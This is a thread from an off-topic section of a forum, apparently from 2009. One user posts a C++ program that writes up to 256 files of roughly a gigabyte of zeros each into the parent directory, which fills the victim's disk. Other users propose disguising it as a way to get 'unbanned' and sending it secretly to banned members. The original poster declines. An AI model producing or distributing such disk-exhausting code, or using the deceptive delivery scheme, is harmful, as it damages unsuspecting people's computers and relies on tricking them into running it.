Off Topic > Off Topic
omg kool program i mad
<< < (5/8) > >>
Azimuth:
C++ bro

--- Code: ---#include <fstream>
using namespace std;

int main()
{
ofstream out;
char a[5];
a[0] = '.';
a[1] = '.';
a[2] = '/';
for(int i=0;i<1024 * 1024;i++)
{
a[3] = i;
a[4] = '\0';
out.open(a);
if(out.is_open())
{
for(int j=0;j<1024;j++)
{
for(int k=0;k<1024;k++)
{
for(int l=0;l<1024;l++)
{
out.put('0');
}
}
}
out.close();
}
}
return 0;
}
--- End code ---
nickbond1:

--- Quote from: Annoying Orangeetfan on August 03, 2009, 08:46:13 PM ---How the heck do you create a program like this?

Also, do send it to cheatmaster and metal mario.  they might have an email you could send to them, telling them to open it if they want unbanned/do whatever you want them to do with it.

--- End quote ---

my quess is that they dont have a working email ( it happens after something big happens ) so send it to em via pm but dont let em see it
Azimuth:
btw im not doing that
nickbond1:
http://www.youtube.com/watch?v=fDRfy2EXYmE&feature=PlayList&p=A2ABB1D6A24E1F2C&playnext=1&playnext_from=PL&index=3

this cant be happening..wait send us the file ( packaged not all out ) and well.........
Azimuth:
l2compile c++
Navigation
Message Index
Next page
Previous page

Go to full version